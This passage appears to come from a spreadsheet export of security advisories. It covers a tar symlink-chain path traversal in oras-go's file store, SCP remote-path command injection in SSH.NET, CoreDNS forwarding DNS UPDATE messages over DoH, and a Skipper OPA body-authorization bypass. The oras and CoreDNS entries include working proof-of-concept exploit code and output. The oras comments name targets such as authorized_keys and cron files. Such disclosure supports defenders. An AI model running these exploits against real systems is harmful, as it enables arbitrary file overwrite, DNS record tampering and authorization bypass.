**Why v2.6.1's `checkSymlinkEscape` does not help.** The fix for GHSA-8xwf-rjm4-xvhv added a symlink-resolving containment check, but it is called only from `resolveWritePath` (`content/file/file.go` line 632) on the **`pushFile`** path. `pushDir` → `extractTarGzip` → `extractTarDirectory` never calls it; `content/file/utils.go` is byte-identical between v2.6.0 and v2.6.1.
**Suggested remediation.** Any of: (a) `Lstat` the final path component before opening for write and reject symlinks; (b) open with `O_NOFOLLOW` (or `O_EXCL` for new files); (c) resolve link targets with `filepath.EvalSymlinks` on the deepest existing ancestor (as `checkSymlinkEscape` already does) instead of lexical `filepath.Join`; (d) extract into a fresh empty directory and use `openat2(RESOLVE_BENEATH)` / `os.Root` (Go 1.24+) for all filesystem operations.
### PoC
```
go mod init poc
go get oras.land/oras-go/v2@v2.6.1
go run .
```
```go
// Arbitrary file write outside a default-configured file.Store via
// symlink-chain bypass in content/file.extractTarDirectory.
//
// ensureLinkPath() validates symlink targets purely lexically with
// filepath.Join, which collapses ".." textually and does not follow
// intermediate symlink components. By first planting a deep "up" symlink
// that legitimately resolves to the extraction root, an "escape" symlink
// can be crafted whose lexical target stays in-bounds but whose
// kernel-resolved target is any absolute path. A follow-up TypeReg entry
// with the same name is opened with O_CREATE|O_TRUNC (no O_NOFOLLOW),
// writing through the symlink.
//
// Realistic trigger: oras.Copy() from an untrusted registry into a
// file.New() store. The attacker controls the manifest (sets
// AnnotationTitle + AnnotationUnpack=true on a layer) and the layer blob.
// All digests are honest, so content verification passes.
package main
import (
        "archive/tar"
        "bytes"
        "compress/gzip"
        "context"
        _ "crypto/sha256"
        "fmt"
        "os"
        "path/filepath"
        "strings"
        "github.com/opencontainers/go-digest"
        ocispec "github.com/opencontainers/image-spec/specs-go/v1"
        "oras.land/oras-go/v2/content/file"
)
func main() {
        if err := run(); err != nil {
                fmt.Println("ERROR:", err)
                os.Exit(1)
        }
}
func run() error {
        ctx := context.Background()
        // Victim's working directory for the file store.
        workDir, err := os.MkdirTemp("", "oras-victim-*")
        if err != nil {
                return err
        }
        defer os.RemoveAll(workDir)
        fmt.Println("[*] file.Store working dir:", workDir)
        // Target path the attacker wants to write, OUTSIDE workDir.
        // (Could be ~/.ssh/authorized_keys, ~/.bashrc, /etc/cron.d/x, etc.;
        // a temp path keeps the demo self-contained.)
        outsidePath := filepath.Join(os.TempDir(), "oras-PWNED")
        _ = os.Remove(outsidePath)
        defer os.Remove(outsidePath)
        fmt.Println("[*] attacker target (outside workDir):", outsidePath)
        // The layer's AnnotationTitle. extractTarDirectory uses this as both the
        // in-tar prefix and the on-disk subdir under workDir.
        const title = "out"
        baseAbs := filepath.Join(workDir, title)
        // N nested dirs + a symlink "up" -&gt; N*"../" so that after the kernel
        // follows "up" (landing at baseAbs) the remaining N lexical ".."
        // components climb from baseAbs to "/". N must be &gt;= depth(baseAbs).
        depth := len(strings.Split(strings.Trim(filepath.ToSlash(baseAbs), "/"), "/"))
        fmt.Printf("[*] baseAbs depth = %d, building %d nested dirs\n", depth, depth)
        gz, dgst, size, err := buildMaliciousLayer(title, depth, outsidePath)
        if err != nil {
                return err
        }
        // Descriptor exactly as it would appear in a manifest's "layers" array.
        desc := ocispec.Descriptor{
                MediaType: "application/vnd.oci.image.layer.v1.tar+gzip",
                Digest:    dgst,
                Size:      size,
                Annotations: map[string]string{
                        ocispec.AnnotationTitle: title,
                        file.AnnotationUnpack:   "true",
                },
        }
        // Victim creates a file store with default settings (path traversal DISALLOWED).
        store, err := file.New(workDir)
        if err != nil {
                return err
        }
        defer store.Close()
        fmt.Println("[*] store.AllowPathTraversalOnWrite =", store.AllowPathTraversalOnWrite)
        // This is exactly what oras.Copy() invokes per layer.
        if err := store.Push(ctx, desc, bytes.NewReader(gz)); err != nil {
                return fmt.Errorf("Push: %w", err)
        }
        // Check whether the out-of-tree file was written.
        if data, err := os.ReadFile(outsidePath); err == nil {
                rel, _ := filepath.Rel(workDir, outsidePath)
                fmt.Printf("\n[!] BYPASS: wrote %q to %s\n", string(data), outsidePath)
                fmt.Printf("[!] relative to workDir: %s\n", rel)
                fmt.Println("[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir")
                return nil
        }
        fmt.Println("\n[-] no escape (file not created at", outsidePath, ")")
        return nil
}
// buildMaliciousLayer builds a tar.gz that, when extracted by
// content/file.extractTarDirectory under &lt;workDir&gt;/&lt;title&gt;, writes to outsidePath.
func buildMaliciousLayer(title string, depth int, outsidePath string) ([]byte, digest.Digest, int64, error) {
        var buf bytes.Buffer
        gzw := gzip.NewWriter(&amp;buf)
        tw := tar.NewWriter(gzw)
        // 1. Nested directories: title/d0/d1/.../d{depth-1}
        dirs := make([]string, depth)
        for i := 0; i &lt; depth; i++ {
                dirs[i] = fmt.Sprintf("d%d", i)
        }
        for i := 1; i &lt;= depth; i++ {
                name := title + "/" + strings.Join(dirs[:i], "/")
                if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeDir, Name: name, Mode: 0o755}); err != nil {
                        return nil, "", 0, err
                }
        }
        // 2. "up" symlink at the bottom, pointing back to baseAbs via depth*"../".
        //    Lexically AND on disk this resolves to baseAbs - passes ensureLinkPath.
        upName := title + "/" + strings.Join(dirs, "/") + "/up"
        upTarget := strings.Repeat("../", depth-1) + ".."
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: upName, Linkname: upTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 3. "escape" symlink at title/escape.
        //    Target = d0/.../d{N-1}/up/../.. (N times) /&lt;outsidePath&gt;
        //    LEXICAL clean: the N ".." cancel "up" + (N-1) dirs, leaving
        //      d0/&lt;outsidePath&gt;  - INSIDE baseAbs, so ensureLinkPath accepts it.
        //    KERNEL: d0/.../up follows the symlink to baseAbs, then N*".."
        //      climbs to "/", then appends outsidePath.
        dots := strings.Repeat("../", depth-1) + ".."
        escapeTarget := strings.Join(dirs, "/") + "/up/" + dots + outsidePath
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeSymlink, Name: title + "/escape", Linkname: escapeTarget, Mode: 0o777}); err != nil {
                return nil, "", 0, err
        }
        // 4. Regular file entry at title/escape - same path as the symlink.
        //    resolveRelToBase("escape") has dir=="." so the per-component Lstat
        //    loop never runs; writeFile opens with O_CREATE|O_TRUNC (no
        //    O_NOFOLLOW) and writes through the symlink to outsidePath.
        payload := []byte("PWNED-BY-ORAS-TARSLIP")
        if err := tw.WriteHeader(&amp;tar.Header{Typeflag: tar.TypeReg, Name: title + "/escape", Mode: 0o644, Size: int64(len(payload))}); err != nil {
                return nil, "", 0, err
        }
        if _, err := tw.Write(payload); err != nil {
                return nil, "", 0, err
        }
        if err := tw.Close(); err != nil {
                return nil, "", 0, err
        }
        if err := gzw.Close(); err != nil {
                return nil, "", 0, err
        }
        data := buf.Bytes()
        return data, digest.FromBytes(data), int64(len(data)), nil
}
```
Expected output (paths vary):
```
[*] file.Store working dir: /tmp/oras-victim-209731351
[*] attacker target (outside workDir): /tmp/oras-PWNED
[*] baseAbs depth = 3, building 3 nested dirs
[*] store.AllowPathTraversalOnWrite = false
[!] BYPASS: wrote "PWNED-BY-ORAS-TARSLIP" to /tmp/oras-PWNED
[!] relative to workDir: ../oras-PWNED
[!] PATH TRAVERSAL CONFIRMED - file written OUTSIDE file.Store working dir
```
### Impact
**Who is affected:** Any application that pulls or pushes OCI artifacts from an untrusted or attacker-influenced source into a `content/file.Store` — e.g. `oras.Copy(ctx, remoteRepo, ref, file.New(dir), ref, opts)`, the documented primary use of the file store — with default settings (`AllowPathTraversalOnWrite=false`, `SkipUnpack=false`). Downstream consumers include the ORAS CLI (`oras pull` to a directory) and tools built on oras-go that materialise artifact contents on disk.
**What the attacker gains:** Arbitrary file create/overwrite anywhere writable by the pulling process. Practical escalations include overwriting `~/.ssh/authorized_keys`, `~/.bashrc`/`~/.profile`, Git hooks, or (when running as root, e.g. in CI or a controller) `/etc/cron.d/*` or binaries on `$PATH` — i.e. remote code execution on the victim host.
**Preconditions / reachability:** No local preconditions beyond pulling an attacker-controlled artifact; the attacker does **not** need any pre-existing symlink in the victim's working directory (unlike GHSA-8xwf-rjm4-xvhv / CVE-2026-50162, which this issue is distinct from). The attack is delivered over the network via a registry the victim pulls from; no authentication to the victim is required. User interaction is limited to the victim choosing to pull the artifact (`UI:R`).</t>
        </is>
      </c>
      <c r="T262" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85731</t>
        </is>
      </c>
    </row>
    <row r="263">
      <c r="A263" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B263" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C263" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85756</t>
        </is>
      </c>
      <c r="D263" s="5" t="inlineStr"/>
      <c r="E263" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F263" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G263" s="5" t="inlineStr"/>
      <c r="H263" s="5" t="inlineStr"/>
      <c r="I263" s="5" t="inlineStr"/>
      <c r="J263" s="5" t="inlineStr"/>
      <c r="K263" s="5" t="inlineStr"/>
      <c r="L263" s="5" t="inlineStr">
        <is>
          <t>nuget:SSH.NET</t>
        </is>
      </c>
      <c r="M263" s="5" t="inlineStr">
        <is>
          <t>2026.0.0</t>
        </is>
      </c>
      <c r="N263" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O263" s="5" t="inlineStr"/>
      <c r="P263" s="5" t="inlineStr"/>
      <c r="Q263" s="5" t="inlineStr"/>
      <c r="R263" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S263" s="5" t="inlineStr">
        <is>
          <t>## Summary
Default SCP remote-path handling places caller-supplied paths into the command that runs scp on the server. On a shell-based server that command is interpreted by a shell, so an attacker-influenced path that is not quoted to suit that shell can execute as a command as the authenticated SSH user. SSH.NET provides `ScpClient.RemotePathTransformation` to control escaping behaviour (defaulting to `RemotePathTransformation.DoubleQuote`) but cannot guarantee safety for arbitrary remote command interpreters. This is inherent to running scp over a remote shell (cf. CVE-2020-15778).
## Impact
Command execution on the SSH server as the authenticated SSH user, when an application passes an attacker-influenced remote path to ScpClient against a shell-based server.
Exploitation depends on conditions beyond the attacker's control: the remote server must be shell-based, and the attacker-influenced path must be crafted to defeat the quoting applied by the transformation in effect — that is, to use metacharacters that it does not neutralise (for example $(...) or backticks, which survive the default double-quoting on a POSIX shell). A path that does not meet these escaping rules, or a non-shell-based server, does not result in command execution.
## Remediation
The fixed release obsoletes the constructors that silently defaulted the path transformation and adds constructors that require an explicit `IRemotePathTransformation`, so callers are required to choose one that suits their server and trust environment. For POSIX shells, the library provides `RemotePathTransformation.ShellQuote`. The legacy default (`RemotePathTransformation.DoubleQuote`) is unchanged for backwards compatibility. SCP is considered legacy and SFTP, which does not involve a remote shell, is recommended where possible (via `SftpClient`).</t>
        </is>
      </c>
      <c r="T263" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85756</t>
        </is>
      </c>
    </row>
    <row r="264">
      <c r="A264" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B264" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C264" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86003</t>
        </is>
      </c>
      <c r="D264" s="5" t="inlineStr"/>
      <c r="E264" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F264" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G264" s="5" t="inlineStr"/>
      <c r="H264" s="5" t="inlineStr"/>
      <c r="I264" s="5" t="inlineStr"/>
      <c r="J264" s="5" t="inlineStr"/>
      <c r="K264" s="5" t="inlineStr"/>
      <c r="L264" s="5" t="inlineStr">
        <is>
          <t>go:github.com/coredns/coredns</t>
        </is>
      </c>
      <c r="M264" s="5" t="inlineStr">
        <is>
          <t>1.14.7</t>
        </is>
      </c>
      <c r="N264" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O264" s="5" t="inlineStr"/>
      <c r="P264" s="5" t="inlineStr"/>
      <c r="Q264" s="5" t="inlineStr"/>
      <c r="R264" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S264" s="5" t="inlineStr">
        <is>
          <t>### Summary
CoreDNS accepted [RFC 2136](https://datatracker.ietf.org/doc/html/rfc2136) UPDATE messages over DoH, DoH3, DoQ, and DNS-over-gRPC, then allowed the `proxy`/`forward` plugin to send them unchanged to an upstream DNS server. UDP, TCP, and DoT rejected the same opcode before plugin dispatch.
If an update-capable upstream trusts CoreDNS's source address or authenticated connection instead of requiring end-to-end TSIG, an unauthenticated client can use CoreDNS to add, replace, or delete DNS records.
### Details
The affected listeners called `dns.Msg.Unpack` without the request policy used by the UDP/TCP server:
- [DoH and DoH3](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/doh/doh.go#L134-L155)
- [DoQ](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_quic.go#L212-L219)
- [DNS-over-gRPC](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/core/dnsserver/server_grpc.go#L176-L184)
CoreDNS routed the message using its Zone question without checking the opcode. [`forward`](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/forward/forward.go#L113-L118) then passed the original message to the [upstream](https://github.com/coredns/coredns/blob/18a58b9e898ccd95c3f8ee72a37b95b3d1e3e928/plugin/pkg/proxy/connect.go#L150-L167).
By contrast, [`dns.DefaultMsgAcceptFunc`](https://github.com/miekg/dns/blob/v1.1.72/acceptfunc.go#L33-L57) allows only QUERY and NOTIFY. The fix applies that policy to the raw header via [`dnsutil.UnpackRequest`](https://github.com/coredns/coredns/blob/530b0a5ff2ad68cc0421f10dd93568945cc671c9/plugin/pkg/dnsutil/message.go#L13-L23) before any affected transport dispatches the request.
### PoC
The reproducer starts a standard-library synthetic DNS upstream on loopback, sends an unsigned UPDATE over DoH, and reports whether the upstream received the record. It supports both UDP and TCP because the `forward` plugin may select either transport. It does not contact or modify a real authoritative server.
Clone the repository and build the server:
```bash
git clone git@github.com:coredns/coredns.git
cd coredns
git checkout d5e54040ffab9a5c12c6de27b66f59f62b385195 # latest pre-fix commit from main
go build -tags=grpcnotrace -o coredns .
```
Save this as `Corefile.poc`:
```text
https://.:8053 {
    bind 127.0.0.1
    tls plugin/tls/test_cert.pem plugin/tls/test_key.pem
    forward . 127.0.0.1:15354
}
```
Save this as `poc.py`:
```python
#!/usr/bin/env python3
import argparse
import http.client
import queue
import socket
import ssl
import struct
import threading
OPCODE_UPDATE = 5
TYPE_A = 1
CLASS_IN = 1
def encode_name(name):
    return b"".join(bytes((len(label),)) + label.encode() for label in name.rstrip(".").split(".")) + b"\x00"
def update_message():
    zone = encode_name("example.com.") + struct.pack("!HH", 6, CLASS_IN)
    update = (
        encode_name("foo.example.com.")
        + struct.pack("!HHIH", TYPE_A, CLASS_IN, 300, 4)
        + socket.inet_aton("192.0.2.123")
    )
    header = struct.pack("!HHHHHH", 0x1234, OPCODE_UPDATE &lt;&lt; 11, 1, 0, 1, 0)
    return header + zone + update
def read_name(message, offset):
    labels = []
    end = None
    seen = set()
    while True:
        if offset &gt;= len(message) or offset in seen:
            raise ValueError("invalid DNS name")
        seen.add(offset)
        length = message[offset]
        if length &amp; 0xC0 == 0xC0:
            if offset + 1 &gt;= len(message):
                raise ValueError("truncated compression pointer")
            if end is None:
                end = offset + 2
            offset = ((length &amp; 0x3F) &lt;&lt; 8) | message[offset + 1]
            continue
        offset += 1
        if length == 0:
            return ".".join(labels) + ".", end if end is not None else offset
        if length &amp; 0xC0 or offset + length &gt; len(message):
            raise ValueError("invalid DNS label")
        labels.append(message[offset : offset + length].decode("ascii"))
        offset += length
def question_end(message, count):
    offset = 12
    for _ in range(count):
        _, offset = read_name(message, offset)
        offset += 4
        if offset &gt; len(message):
            raise ValueError("truncated question")
    return offset
def parse_update(message):
    _, flags, qdcount, _, nscount, _ = struct.unpack_from("!HHHHHH", message)
    if (flags &gt;&gt; 11) &amp; 0xF != OPCODE_UPDATE or qdcount != 1 or nscount &lt; 1:
        return None
    offset = question_end(message, qdcount)
    name, offset = read_name(message, offset)
    rrtype, rrclass, ttl, rdlength = struct.unpack_from("!HHIH", message, offset)
    offset += 10
    rdata = message[offset : offset + rdlength]
    if rrtype != TYPE_A or rrclass != CLASS_IN or len(rdata) != 4:
        return None
    return name, ttl, socket.inet_ntoa(rdata)
def response_for(message):
    ident, flags, qdcount, _, _, _ = struct.unpack_from("!HHHHHH", message)
    end = question_end(message, qdcount)
    response_flags = flags | 0x8000
    return struct.pack("!HHHHHH", ident, response_flags, qdcount, 0, 0, 0) + message[12:end]
def handle_message(message, peer, received):
    try:
        update = parse_update(message)
        response = response_for(message)
    except (ValueError, struct.error):
        return None
    if update is not None:
        received.put((peer, update))
    return response
def serve_udp(sock, received, stopped):
    while not stopped.is_set():
        try:
            message, peer = sock.recvfrom(65535)
        except socket.timeout:
            continue
        except OSError:
            return
        response = handle_message(message, peer, received)
        if response is not None:
            sock.sendto(response, peer)
def recv_exact(connection, size, stopped):
    data = bytearray()
    while len(data) &lt; size and not stopped.is_set():
        try:
            chunk = connection.recv(size - len(data))
        except socket.timeout:
            continue
        if not chunk:
            return None
        data.extend(chunk)
    return bytes(data) if len(data) == size else None
def serve_tcp(sock, received, stopped):
    while not stopped.is_set():
        try:
            connection, peer = sock.accept()
        except socket.timeout:
            continue
        except OSError:
            return
        with connection:
            connection.settimeout(0.1)
            while not stopped.is_set():
                length = recv_exact(connection, 2, stopped)
                if length is None:
                    break
                message = recv_exact(connection, struct.unpack("!H", length)[0], stopped)
                if message is None:
                    break
                response = handle_message(message, peer, received)
                if response is not None:
                    connection.sendall(struct.pack("!H", len(response)) + response)
def send_doh(host, port, payload, timeout):
    context = ssl._create_unverified_context()
    connection = http.client.HTTPSConnection(host, port, timeout=timeout, context=context)
    try:
        connection.request(
            "POST",
            "/dns-query",
            body=payload,
            headers={"Content-Type": "application/dns-message"},
        )
        response = connection.getresponse()
        body = response.read()
        return response.status, len(body)
    finally:
        connection.close()
def main():
    parser = argparse.ArgumentParser(description="Probe whether CoreDNS forwards RFC 2136 UPDATE over DoH")
    parser.add_argument("--host", default="127.0.0.1")
    parser.add_argument("--port", type=int, default=8053)
    parser.add_argument("--upstream-host", default="127.0.0.1")
    parser.add_argument("--upstream-port", type=int, default=15354)
    parser.add_argument("--timeout", type=float, default=2.0)
    parser.add_argument("--expect", choices=("forwarded", "blocked", "either"), default="either")
    args = parser.parse_args()
    received = queue.Queue()
    stopped = threading.Event()
    udp_sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
    udp_sock.settimeout(0.1)
    udp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    tcp_sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    tcp_sock.settimeout(0.1)
    tcp_sock.bind((args.upstream_host, args.upstream_port))
    tcp_sock.listen()
    threads = [
        threading.Thread(target=serve_udp, args=(udp_sock, received, stopped), daemon=True),
        threading.Thread(target=serve_tcp, args=(tcp_sock, received, stopped), daemon=True),
    ]
    for thread in threads:
        thread.start()
    payload = update_message()
    try:
        status, response_bytes = send_doh(args.host, args.port, payload, args.timeout)
        try:
            peer, update = received.get(timeout=args.timeout)
        except queue.Empty:
            peer = update = None
    finally:
        stopped.set()
        udp_sock.close()
        tcp_sock.close()
        for thread in threads:
            thread.join(timeout=1)
    print("payload=%d opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123" % len(payload))
    print("http_status=%d response_bytes=%d" % (status, response_bytes))
    if update is None:
        result = "blocked"
        print("upstream_received_update=false")
    else:
        result = "forwarded"
        name, ttl, address = update
        print("upstream_received_update=true source=%s:%d" % peer)
        print("upstream_record=%s %d IN A %s" % (name, ttl, address))
    print("result=%s" % result)
    if args.expect != "either" and args.expect != result:
        raise SystemExit("expected %s, got %s" % (args.expect, result))
if __name__ == "__main__":
    main()
```
Start the vulnerable revision:
```sh
./coredns -conf Corefile.poc
```
In a second terminal, run the probe:
```console
$ python3 poc.py --expect forwarded
payload=60 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=200 response_bytes=29
upstream_received_update=true source=127.0.0.1:52391
upstream_record=foo.example.com. 300 IN A 192.0.2.123
result=forwarded
```
The ephemeral source port varies. The output confirms that the upstream saw the complete UPDATE as a request originating from CoreDNS.
For comparison, build and start CoreDNS with the fix:
```sh
git checkout 530b0a5ff2ad68cc0421f10dd93568945cc671c9 # fix commit from main
go build -tags=grpcnotrace -o coredns-fixed .
./coredns-fixed -conf Corefile.poc
```
The same probe is rejected before reaching the synthetic upstream:
```console
$ python3 poc.py --expect blocked
payload=62 opcode=UPDATE record=foo.example.com. 300 IN A 192.0.2.123
http_status=400 response_bytes=16
upstream_received_update=false
result=blocked
```
### Impact
Exploitation requires all of the following:
- an attacker can reach a CoreDNS DoH, DoH3, DoQ, or DNS-over-gRPC listener
- the selected `proxy`/`forward` target accepts RFC 2136 UPDATE
- the upstream trusts CoreDNS's source address or connection and does not require an attacker-unknown TSIG
The upstream sees the UPDATE as originating from CoreDNS. A successful attack can redirect traffic, take over names, alter mail routing, or disrupt the writable zone. Requiring and validating end-to-end TSIG prevents the demonstrated attack.</t>
        </is>
      </c>
      <c r="T264" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86003</t>
        </is>
      </c>
    </row>
    <row r="265">
      <c r="A265" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B265" s="5" t="inlineStr">
        <is>
          <t>Updated - Fix/version updated</t>
        </is>
      </c>
      <c r="C265" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86043</t>
        </is>
      </c>
      <c r="D265" s="5" t="inlineStr"/>
      <c r="E265" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F265" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G265" s="5" t="inlineStr"/>
      <c r="H265" s="5" t="inlineStr"/>
      <c r="I265" s="5" t="inlineStr"/>
      <c r="J265" s="5" t="inlineStr"/>
      <c r="K265" s="5" t="inlineStr"/>
      <c r="L265" s="5" t="inlineStr">
        <is>
          <t>go:github.com/zalando/skipper</t>
        </is>
      </c>
      <c r="M265" s="5" t="inlineStr">
        <is>
          <t>0.27.37</t>
        </is>
      </c>
      <c r="N265" s="5" t="inlineStr">
        <is>
          <t>GHSA, OSV</t>
        </is>
      </c>
      <c r="O265" s="5" t="inlineStr"/>
      <c r="P265" s="5" t="inlineStr"/>
      <c r="Q265" s="5" t="inlineStr"/>
      <c r="R265" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S265" s="5" t="inlineStr">
        <is>
          <t>- **Affected component:** `filters/openpolicyagent/openpolicyagent.go` → `ExtractHttpBodyOptionally`; combined with `github.com/open-policy-agent/opa-envoy-plugin` `envoyauth/request.go` → `getParsedBody` / `checkIfHTTPBodyTruncated`. Filter: `opaAuthorizeRequestWithBody`.
- **Affected versions:** `&lt;= 0.27.33` (current HEAD `e7d7014c`). The `truncated_body` mitigation was introduced/recommended in v0.27.26 (advisory GHSA-8qqm-fp2q-v734) and remains bypassable.
- **Fix chain being audited:** CVE-2026-50197 (GHSA-659f-rgp5-w4wf, commit `3152f3b0`) → GHSA-8qqm-fp2q-v734 (docs + code, commit `1be950cd` #4126, v0.27.26). This finding is the third, still-open variant.
## Summary
Skipper's `opaAuthorizeRequestWithBody` filter authorizes requests by handing the (bounded) request body to Open Policy Agent. When a body exceeds `-open-policy-agent-max-request-body-size` (default 1 MB), Skipper truncates it before OPA sees it. Advisory **GHSA-8qqm-fp2q-v734** established that deny-on-presence / body-inspecting policies fail OPEN on oversized bodies, and its remediation instructs policy authors to **guard on `input.attributes.request.http.truncated_body`** (implemented as the top-level `input.truncated_body`):
```rego
default allow := false
allow if {
    input.truncated_body == false
    # ... body-based conditions
}
```
That mitigation is itself incomplete. The `truncated_body` flag is computed by the OPA envoy plugin **only when a `content-length` header is present**. A request sent with `Transfer-Encoding: chunked` (HTTP/1.1) or over HTTP/2 carries **no `content-length`**, so `truncated_body` is left `false` even though Skipper truncated the body. The mitigated policy therefore evaluates `input.truncated_body == false` as *true* and **ALLOWS** the request, while the **full, un-inspected oversized payload is forwarded to the upstream** (Skipper's `bufferedBodyReader` streams the buffered prefix and then continues draining the original body).
The transport that defeats the mitigation — chunked / HTTP-2 without Content-Length — is the **exact transport class the original CVE-2026-50197 was about**; the GHSA-8qqm fix closed the declared-Content-Length variant and its positive-control test only exercised *small* chunked bodies, never *oversized* chunked bodies.
## Root cause
`opa-envoy-plugin/envoyauth/request.go`:
```go
func getParsedBody(...) (any, bool, error) {
    if val, ok := headers["content-type"]; ok {
        if strings.Contains(val, "application/json") {
            ...
            if val, ok := headers["content-length"]; ok {          // &lt;-- only path that sets truncation
                truncated, err := checkIfHTTPBodyTruncated(val, int64(len(body)))
                ...
                if truncated { return nil, true, nil }
            }
            ...
        } else if ... "application/x-www-form-urlencoded" { /* same content-length gate */ }
          else if ... "multipart/form-data"            { /* same content-length gate */ }
    }
    return data, false, nil     // &lt;-- no content-length  ==&gt; truncated_body = false
}
func checkIfHTTPBodyTruncated(contentLength string, bodyLength int64) (bool, error) {
    cl, _ := strconv.ParseInt(contentLength, 10, 64)
    if cl != -1 &amp;&amp; cl &gt; bodyLength { return true, nil }
    return false, nil
}
```
Truncation can only ever be signalled by comparing `content-length` against the received body length. With chunked/HTTP-2 there is no `content-length`, so the comparison is skipped and `truncated_body` is reported `false`. Skipper (`ExtractHttpBodyOptionally`) meanwhile *does* truncate the chunked body to `maxBodyBytes` (it sets `expectedSize = maxBodyBytes` when `req.ContentLength &lt; 0`), producing the exact divergence: OPA is told "not truncated", but the body was truncated, and the backend receives the whole thing.
## Reachability
1. Deployment runs `opaAuthorizeRequestWithBody` with a body-inspecting policy that follows the GHSA-8qqm mitigation (`allow if input.truncated_body == false`). This is the maintainer-recommended configuration (advisory + v0.27.26 docs).
2. Attacker sends a request whose body exceeds `max-request-body-size` using `Transfer-Encoding: chunked` (or HTTP/2). No `content-length` header is present.
3. `ExtractHttpBodyOptionally` reads/truncates the body to `maxBodyBytes`; `rawBody` is the truncated prefix.
4. `AdaptToExtAuthRequest` forwards the lowercased headers (no `content-length`) and the truncated `RawBody` to OPA.
5. `getParsedBody` finds no `content-length` → `truncated_body = false`; for a non-parsed content-type it also returns `parsed_body = null` with no error.
6. Policy: `input.truncated_body == false` is satisfied → `allow = true`.
7. Skipper forwards the request; `bufferedBodyReader.Read` serves the buffered prefix and then continues reading the original `req.Body`, delivering the **full oversized payload** to the upstream.
Every guard on the path is accounted for: the only "guard" is `truncated_body`, and it is defeated by omitting `content-length`.
## Impact
Bypass of OPA request-body authorization for any deployment that adopted the official `truncated_body` mitigation. Requests that the policy is meant to reject (oversized / un-inspectable bodies, or bodies whose forbidden content lies beyond the inspection window) are authorized and forwarded in full to the protected upstream. Same security property and severity class as CVE-2026-50197 / GHSA-8qqm (both High).
## CVSS 3.1
Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N` = **7.5 High**
- **AV:N** — remote HTTP request.
- **AC:L** — single crafted request; no race/special conditions (just chunked framing + padding).
- **PR:N / UI:N** — unauthenticated, no user interaction.
- **S:U** — impact within the authorized component/upstream trust scope.
- **C:N** — no direct disclosure by the bypass itself.
- **I:H** — authorization control is bypassed; forbidden request content reaches the upstream (integrity of the access-control decision / protected resource).
- **A:N** — not primarily an availability issue.
(Conditional: exploitable only where `opaAuthorizeRequestWithBody` is used with a `truncated_body`-gated policy — i.e. deployments that followed the GHSA-8qqm mitigation. Consistent with the conditional nature of the parent CVEs.)
## Proof of Concept
Executable Go test added to the OPA filter package. It stands up a real Skipper proxy (`proxy.WithParams`) + a real OPA control plane (`opasdktest`) with `WithMaxRequestBodyBytes(32)` and the advisory's verbatim mitigation policy (`allow if input.truncated_body == false`), routed to a recording upstream.
- **Positive control** — oversized body **with Content-Length** → `truncated_body=true` → **403** (mitigation works).
- **Bypass** — identical oversized body sent **chunked** (no Content-Length) → `truncated_body=false` → **200**, and the upstream receives the **full** 66-byte payload past the 32-byte inspection cap.
Command and observed benign output:
```
$ go test ./filters/openpolicyagent/ -run TestTruncatedBodyChunkedBypass -count=1 -v
    poc_truncated_body_chunked_test.go:148: [content-length ] status=403 upstream_body_bytes=-1
    poc_truncated_body_chunked_test.go:154: [chunked        ] status=200 upstream_body_bytes=66
--- PASS: TestTruncatedBodyChunkedBypass (0.11s)
PASS
```
- content-length variant → **403**, upstream received nothing (`-1`) — mitigation works.
- chunked variant (byte-identical body) → **200**, upstream received the **full 66-byte** payload past the 32-byte cap — **authorization bypass**.
(Full PoC source is appended below by the submission tool via `--poc-file`.)
## Adversarial re-read (refutation attempts)
